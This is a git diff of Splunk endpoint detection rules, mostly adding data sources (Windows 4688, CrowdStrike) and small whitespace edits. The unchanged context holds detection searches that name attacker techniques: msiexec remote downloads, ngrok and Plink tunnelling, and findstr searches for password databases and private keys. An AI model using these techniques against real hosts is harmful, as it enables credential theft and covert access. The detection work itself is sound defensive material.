diff --git a/detections/endpoint/windows_modify_registry_tamper_protection.yml b/detections/endpoint/windows_modify_registry_tamper_protection.yml
index d35c5a3f93..260fd5ba85 100644
--- a/detections/endpoint/windows_modify_registry_tamper_protection.yml
+++ b/detections/endpoint/windows_modify_registry_tamper_protection.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a suspicious modification to the Windows
   Defender Tamper Protection registry setting. It leverages data from the Endpoint
diff --git a/detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml b/detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml
index 60b4641bd4..e9d8f22e58 100644
--- a/detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml
+++ b/detections/endpoint/windows_modify_registry_updateserviceurlalternate.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Anomaly
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a suspicious modification to the Windows
   Update configuration registry key, specifically targeting the UpdateServiceUrlAlternate
diff --git a/detections/endpoint/windows_modify_registry_usewuserver.yml b/detections/endpoint/windows_modify_registry_usewuserver.yml
index acbbb57bfa..5b4c591d67 100644
--- a/detections/endpoint/windows_modify_registry_usewuserver.yml
+++ b/detections/endpoint/windows_modify_registry_usewuserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Hunting
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects a suspicious modification to the Windows
   Update configuration registry key "UseWUServer." It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml b/detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml
index 5c29de3e84..14a104ee88 100644
--- a/detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml
+++ b/detections/endpoint/windows_modify_registry_with_md5_reg_key_name.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects potentially malicious registry modifications
   characterized by MD5-like registry key names. It leverages the Endpoint data model
diff --git a/detections/endpoint/windows_modify_registry_wuserver.yml b/detections/endpoint/windows_modify_registry_wuserver.yml
index 3c71d7f3fc..c67ea368a9 100644
--- a/detections/endpoint/windows_modify_registry_wuserver.yml
+++ b/detections/endpoint/windows_modify_registry_wuserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Hunting
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects suspicious modifications to the Windows
   Update Server (WUServer) registry settings. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_modify_registry_wustatusserver.yml b/detections/endpoint/windows_modify_registry_wustatusserver.yml
index 92790bcc74..c347ac54e5 100644
--- a/detections/endpoint/windows_modify_registry_wustatusserver.yml
+++ b/detections/endpoint/windows_modify_registry_wustatusserver.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: Hunting
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic identifies suspicious modifications to the Windows
   Update configuration registry, specifically targeting the WUStatusServer key. It
diff --git a/detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml b/detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml
index 4f97037742..80738ab935 100644
--- a/detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml
+++ b/detections/endpoint/windows_modify_show_compress_color_and_info_tip_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects suspicious modifications to the Wind
   elements. If confirmed malicious, this could signify an attempt to manipulate file
   visibility and deceive users, potentially aiding in further malicious activities.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path = "*\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced*"
diff --git a/detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml b/detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml
index be273fc785..6e4a52b436 100644
--- a/detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml
+++ b/detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects suspicious modifications to system firewall
   rules, specifically allowing execution of applications from notable and potentially
   malicious file paths. This detection leverages data from Endpoint Detection and
diff --git a/detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml b/detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml
index ba34e91262..570b766e26 100644
--- a/detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml
+++ b/detections/endpoint/windows_mof_event_triggered_execution_via_wmi.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of MOFComp.exe loading
   code, maintain persistence, or escalate privileges within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name
   IN ("cmd.exe", "powershell.exe") Processes.process_name=mofcomp.exe) OR (Processes.process_name=mofcomp.exe
diff --git a/detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml b/detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml
index e2f281fa89..707a655921 100644
--- a/detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml
+++ b/detections/endpoint/windows_msexchange_management_mailbox_cmdlet_usage.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies suspicious Cmdlet usage in Exchan
   new roles, or search mailboxes, leading to data breaches and privilege escalation.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '`msexchange_management` EventCode=1 Message IN ("*New-MailboxExportRequest*",
   "*New-ManagementRoleAssignment*", "*New-MailboxSearch*", "*Get-Recipient*", "*Search-Mailbox*")
   | stats count min(_time) as firstTime max(_time) as lastTime by host Message | `security_content_ctime(firstTime)`
diff --git a/detections/endpoint/windows_mshta_execution_in_registry.yml b/detections/endpoint/windows_mshta_execution_in_registry.yml
index 49612a23f0..4100435773 100644
--- a/detections/endpoint/windows_mshta_execution_in_registry.yml
+++ b/detections/endpoint/windows_mshta_execution_in_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the execution of mshta.exe via regis
   arbitrary code, and evade traditional file-based detection methods, posing a significant
   threat to system integrity and security.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_value_data
diff --git a/detections/endpoint/windows_msiexec_dllregisterserver.yml b/detections/endpoint/windows_msiexec_dllregisterserver.yml
index 6e4cbd104a..25d55657ca 100644
--- a/detections/endpoint/windows_msiexec_dllregisterserver.yml
+++ b/detections/endpoint/windows_msiexec_dllregisterserver.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of msiexec.exe with th
   maintain persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_msiexec` Processes.process
   IN ("*/y*", "*-y*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml b/detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml
index c26455606b..2e2a73f927 100644
--- a/detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml
+++ b/detections/endpoint/windows_msiexec_hidewindow_rundll32_execution.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the execution of the msiexec.exe process
   with the /HideWindow and rundll32 command-line parameters. It leverages data from
   Endpoint Detection and Response (EDR) agents, focusing on process creation events
diff --git a/detections/endpoint/windows_msiexec_remote_download.yml b/detections/endpoint/windows_msiexec_remote_download.yml
index 39c2e2562b..2b7f246cee 100644
--- a/detections/endpoint/windows_msiexec_remote_download.yml
+++ b/detections/endpoint/windows_msiexec_remote_download.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of msiexec.exe with an HTTP
   execution, system compromise, or further malware deployment within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_msiexec` Processes.process
   IN ("*http://*", "*https://*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_msiexec_spawn_discovery_command.yml b/detections/endpoint/windows_msiexec_spawn_discovery_command.yml
index 4feab4b691..0367683bf1 100644
--- a/detections/endpoint/windows_msiexec_spawn_discovery_command.yml
+++ b/detections/endpoint/windows_msiexec_spawn_discovery_command.yml
@@ -15,6 +15,8 @@ description: The following analytic detects MSIExec spawning multiple discovery
   within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=msiexec.exe
   Processes.process_name IN ("powershell.exe","cmd.exe", "nltest.exe","ipconfig.exe","systeminfo.exe")
diff --git a/detections/endpoint/windows_msiexec_spawn_windbg.yml b/detections/endpoint/windows_msiexec_spawn_windbg.yml
index 39ee45ee9c..1243cdbe4e 100644
--- a/detections/endpoint/windows_msiexec_spawn_windbg.yml
+++ b/detections/endpoint/windows_msiexec_spawn_windbg.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the unusual behavior of MSIExec spawning
   WinDBG. It detects this activity by analyzing endpoint telemetry data, specifically
   looking for instances where 'msiexec.exe' is the parent process of 'windbg.exe'.
diff --git a/detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml b/detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml
index 1f5f0b29a2..30e7efb7dd 100644
--- a/detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml
+++ b/detections/endpoint/windows_msiexec_unregister_dllregisterserver.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of msiexec.exe with the /z s
   system functionality, leading to further compromise of the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_msiexec` Processes.process
   IN ("*/z*", "*-z*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_msiexec_with_network_connections.yml b/detections/endpoint/windows_msiexec_with_network_connections.yml
index b86543a515..fde323dc9b 100644
--- a/detections/endpoint/windows_msiexec_with_network_connections.yml
+++ b/detections/endpoint/windows_msiexec_with_network_connections.yml
@@ -14,7 +14,7 @@ description: The following analytic detects MSIExec making network connections o
   potentially leading to data exfiltration, command and control (C2) communication,
   or further malware deployment.
 data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 3
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where `process_msiexec` by _time Processes.user Processes.process_id Processes.process_name
   Processes.dest Processes.process_path Processes.process Processes.parent_process_name
diff --git a/detections/endpoint/windows_ngrok_reverse_proxy_usage.yml b/detections/endpoint/windows_ngrok_reverse_proxy_usage.yml
index b66eded1e2..e0f670b1ed 100644
--- a/detections/endpoint/windows_ngrok_reverse_proxy_usage.yml
+++ b/detections/endpoint/windows_ngrok_reverse_proxy_usage.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of ngrok.exe on a Wind
   or facilitate further attacks by tunneling traffic through the compromised system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=ngrok.exe
   Processes.process IN ("*start*", "*--config*","*http*","*authtoken*", "*http*",
diff --git a/detections/endpoint/windows_nirsoft_advancedrun.yml b/detections/endpoint/windows_nirsoft_advancedrun.yml
index f903662971..84c78b5116 100644
--- a/detections/endpoint/windows_nirsoft_advancedrun.yml
+++ b/detections/endpoint/windows_nirsoft_advancedrun.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of AdvancedRun.exe, a
   privileges, or maintain persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=advancedrun.exe
   OR Processes.original_file_name=advancedrun.exe) Processes.process IN ("*EXEFilename*","*/cfg*","*RunAs*",
diff --git a/detections/endpoint/windows_nirsoft_utilities.yml b/detections/endpoint/windows_nirsoft_utilities.yml
index b6b1493fca..cae71dc40f 100644
--- a/detections/endpoint/windows_nirsoft_utilities.yml
+++ b/detections/endpoint/windows_nirsoft_utilities.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the execution of commonly used Ni
   could lead to unauthorized access, data exfiltration, or further system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.parent_process_name
   Processes.process_name Processes.process Processes.original_file_name Processes.process_path
diff --git a/detections/endpoint/windows_njrat_fileless_storage_via_registry.yml b/detections/endpoint/windows_njrat_fileless_storage_via_registry.yml
index d35c591ffe..75586bd532 100644
--- a/detections/endpoint/windows_njrat_fileless_storage_via_registry.yml
+++ b/detections/endpoint/windows_njrat_fileless_storage_via_registry.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects suspicious registry modifications indicative
   of NjRat's fileless storage technique. It leverages the Endpoint.Registry data model
diff --git a/detections/endpoint/windows_odbcconf_hunting.yml b/detections/endpoint/windows_odbcconf_hunting.yml
index 436f7d902a..d0b037f761 100644
--- a/detections/endpoint/windows_odbcconf_hunting.yml
+++ b/detections/endpoint/windows_odbcconf_hunting.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of Odbcconf.exe wit
   privileges, posing a significant threat to the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=odbcconf.exe
   by Processes.dest Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/windows_odbcconf_load_dll.yml b/detections/endpoint/windows_odbcconf_load_dll.yml
index e1b1a3efc6..c14bfc2a35 100644
--- a/detections/endpoint/windows_odbcconf_load_dll.yml
+++ b/detections/endpoint/windows_odbcconf_load_dll.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of odbcconf.exe with t
   movement.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=odbcconf.exe
   Processes.process IN ("*/a *",  "*-a*") Processes.process="*regsvr*"  by Processes.dest
diff --git a/detections/endpoint/windows_odbcconf_load_response_file.yml b/detections/endpoint/windows_odbcconf_load_response_file.yml
index 126f117ddd..1067f4314a 100644
--- a/detections/endpoint/windows_odbcconf_load_response_file.yml
+++ b/detections/endpoint/windows_odbcconf_load_response_file.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of odbcconf.exe with a
   environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=odbcconf.exe
   Processes.process IN ("*-f *","*/f *") Processes.process="*.rsp*"  by Processes.dest
diff --git a/detections/endpoint/windows_office_product_spawning_msdt.yml b/detections/endpoint/windows_office_product_spawning_msdt.yml
index bf57ad3258..4977b332f7 100644
--- a/detections/endpoint/windows_office_product_spawning_msdt.yml
+++ b/detections/endpoint/windows_office_product_spawning_msdt.yml
@@ -15,6 +15,8 @@ description: The following analytic detects a Microsoft Office product spawning
   movement within the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   IN ("winword.exe","excel.exe","powerpnt.exe","outlook.exe","mspub.exe","visio.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe","msaccess.exe")
diff --git a/detections/endpoint/windows_papercut_ng_spawn_shell.yml b/detections/endpoint/windows_papercut_ng_spawn_shell.yml
index e738167a8d..720d9addcc 100644
--- a/detections/endpoint/windows_papercut_ng_spawn_shell.yml
+++ b/detections/endpoint/windows_papercut_ng_spawn_shell.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects instances where the PaperCut NG application
   (pc-app.exe) spawns a Windows shell, such as cmd.exe or PowerShell. This behavior
   is identified using Endpoint Detection and Response (EDR) telemetry, focusing on
diff --git a/detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml b/detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml
index 93b1e11509..145c0623b7 100644
--- a/detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml
+++ b/detections/endpoint/windows_parent_pid_spoofing_with_explorer.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies a suspicious `explorer.exe` process
   with the `/root` command-line parameter. This detection leverages Endpoint Detection
   and Response (EDR) telemetry, focusing on process and command-line data. The presence
diff --git a/detections/endpoint/windows_password_managers_discovery.yml b/detections/endpoint/windows_password_managers_discovery.yml
index 05abef9387..a3bdf3b310 100644
--- a/detections/endpoint/windows_password_managers_discovery.yml
+++ b/detections/endpoint/windows_password_managers_discovery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies command-line activity that search
   laterally, or exfiltrate critical data.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process = "*dir *"
   OR  Processes.process = "*findstr*" AND Processes.process IN ( "*.kdbx*", "*credential*",
diff --git a/detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml b/detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml
index 6c254b3742..96e4214e77 100644
--- a/detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml
+++ b/detections/endpoint/windows_phishing_pdf_file_executes_url_link.yml
@@ -14,6 +14,8 @@ description: The following analytic detects suspicious PDF viewer processes spaw
   environment by exploiting the user's browser to connect to a malicious site.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name  IN
   ("AcroRd32.exe", "FoxitPDFReader.exe") Processes.process_name IN ("firefox.exe",
diff --git a/detections/endpoint/windows_phishing_recent_iso_exec_registry.yml b/detections/endpoint/windows_phishing_recent_iso_exec_registry.yml
index 5b665a92f8..54621c2250 100644
--- a/detections/endpoint/windows_phishing_recent_iso_exec_registry.yml
+++ b/detections/endpoint/windows_phishing_recent_iso_exec_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation of registry artifacts w
   an initial access attempt, potentially leading to further exploitation, persistence,
   or data exfiltration within the environment.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_key_name= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs\\.iso"
diff --git a/detections/endpoint/windows_powershell_remotesigned_file.yml b/detections/endpoint/windows_powershell_remotesigned_file.yml
index 0c4c88c01c..82ee57dd4a 100644
--- a/detections/endpoint/windows_powershell_remotesigned_file.yml
+++ b/detections/endpoint/windows_powershell_remotesigned_file.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the use of the "remotesigned" execution
   policy for PowerShell scripts. It leverages data from Endpoint Detection and Response
   (EDR) agents, focusing on command-line executions containing "remotesigned" and
diff --git a/detections/endpoint/windows_private_keys_discovery.yml b/detections/endpoint/windows_private_keys_discovery.yml
index 8434dab2bb..5ec5ce937b 100644
--- a/detections/endpoint/windows_private_keys_discovery.yml
+++ b/detections/endpoint/windows_private_keys_discovery.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies processes that retrieve informati
   within the compromised environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process = "*dir *"
   OR  Processes.process = "*findstr*" AND Processes.process IN ( "*.rdg*", "*.gpg*",
diff --git a/detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml b/detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml
index 260cd7c510..8320268295 100644
--- a/detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml
+++ b/detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml
@@ -8,13 +8,15 @@ type: TTP
 description: The following analytic detects when a process running with low or medium
   integrity from a user account spawns an elevated process with high or system integrity
   in suspicious locations. This behavior is identified using process execution data
-  from Windows process monitoring or Sysmon Event ID 1. This activity is significant
+  from Windows process monitoring or Sysmon EventID 1. This activity is significant
   as it may indicate a threat actor successfully elevating privileges, which is a
   common tactic in advanced attacks. If confirmed malicious, this could allow the
   attacker to execute code with higher privileges, potentially leading to full system
   compromise and persistent access.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: >-
   | tstats `security_content_summariesonly` count min(_time) as firstTime from datamodel=Endpoint.Processes
   where Processes.process_integrity_level IN ("low","medium","high") NOT Processes.user
diff --git a/detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml b/detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml
index 61bd65496c..a879e325d8 100644
--- a/detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml
+++ b/detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml
@@ -6,13 +6,15 @@ author: Steven Dick
 status: production
 type: TTP
 description: The following analytic detects any system integrity level process spawned
-  by a non-system account. It leverages Sysmon Event ID 1, focusing on process integrity
+  by a non-system account. It leverages Sysmon EventID 1, focusing on process integrity
   and parent user data. This behavior is significant as it often indicates successful
   privilege escalation to SYSTEM from a user-controlled process or service. If confirmed
   malicious, this activity could allow an attacker to gain full control over the system,
   execute arbitrary code, and potentially compromise the entire environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: >-
   `sysmon` EventCode=1 IntegrityLevel="system" ParentUser=* NOT ParentUser IN ("*SYSTEM","*LOCAL
   SERVICE","*NETWORK SERVICE","*DWM-*","*$","-") | eval src_user = replace(ParentUser,"^[^\\\]+\\\\","")
diff --git a/detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml b/detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml
index 72c1a9026f..801c75f46e 100644
--- a/detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml
+++ b/detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects when a process with low, medium, or
   access to sensitive data, and further malicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: >-
   | tstats `security_content_summariesonly` count min(_time) as firstTime from datamodel=Endpoint.Processes
   where Processes.process_integrity_level IN ("low","medium","high") NOT Processes.user
diff --git a/detections/endpoint/windows_process_commandline_discovery.yml b/detections/endpoint/windows_process_commandline_discovery.yml
index 8f0e4adcdb..7f43b2812b 100644
--- a/detections/endpoint/windows_process_commandline_discovery.yml
+++ b/detections/endpoint/windows_process_commandline_discovery.yml
@@ -7,6 +7,8 @@ status: production
 type: Hunting
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic detects the use of Windows Management Instrumentation
   Command-line (WMIC) to retrieve information about running processes, specifically
   targeting the command lines used to launch those processes. This detection leverages
diff --git a/detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml b/detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml
index 8eee5c8a5b..d8485edfd8 100644
--- a/detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml
+++ b/detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml
@@ -7,6 +7,8 @@ status: production
 type: TTP
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies instances of the searchindexer.exe
   process that are not spawned by services.exe, indicating potential process injection.
   This detection leverages data from Endpoint Detection and Response (EDR) agents,
diff --git a/detections/endpoint/windows_process_injection_wermgr_child_process.yml b/detections/endpoint/windows_process_injection_wermgr_child_process.yml
index 16b9b8a305..05db4a79a4 100644
--- a/detections/endpoint/windows_process_injection_wermgr_child_process.yml
+++ b/detections/endpoint/windows_process_injection_wermgr_child_process.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a suspicious instance of wermgr.e
   posing a severe security risk.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
   = "wermgr.exe" AND NOT (Processes.process_name IN ("WerFaultSecure.exe", "wermgr.exe",
diff --git a/detections/endpoint/windows_process_with_namedpipe_commandline.yml b/detections/endpoint/windows_process_with_namedpipe_commandline.yml
index ff2054e86f..82887100fe 100644
--- a/detections/endpoint/windows_process_with_namedpipe_commandline.yml
+++ b/detections/endpoint/windows_process_with_namedpipe_commandline.yml
@@ -15,6 +15,8 @@ description: The following analytic detects processes with command lines contain
   compromise of the system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process = "*\\\\.\\pipe\\*"
   NOT (Processes.process_path IN ("*\\program files*")) by Processes.parent_process_name
diff --git a/detections/endpoint/windows_protocol_tunneling_with_plink.yml b/detections/endpoint/windows_protocol_tunneling_with_plink.yml
index 9acb8d813b..f63bd484c1 100644
--- a/detections/endpoint/windows_protocol_tunneling_with_plink.yml
+++ b/detections/endpoint/windows_protocol_tunneling_with_plink.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Plink for protocol tunnel
   severe threat to the organization's security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name=plink.exe
   OR Processes.original_file_name=Plink Processes.process IN ("*-R *", "*-L *", "*-D
diff --git a/detections/endpoint/windows_proxy_via_netsh.yml b/detections/endpoint/windows_proxy_via_netsh.yml
index b98c7ba434..f72b9963f7 100644
--- a/detections/endpoint/windows_proxy_via_netsh.yml
+++ b/detections/endpoint/windows_proxy_via_netsh.yml
@@ -7,6 +7,8 @@ status: production
 type: Anomaly
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 description: The following analytic identifies the use of netsh.exe to configure a
   connection proxy, which can be leveraged for persistence by executing a helper DLL.
   It detects this activity by analyzing process creation events from Endpoint Detection
diff --git a/detections/endpoint/windows_proxy_via_registry.yml b/detections/endpoint/windows_proxy_via_registry.yml
index 1632eb4c23..54f12e54e0 100644
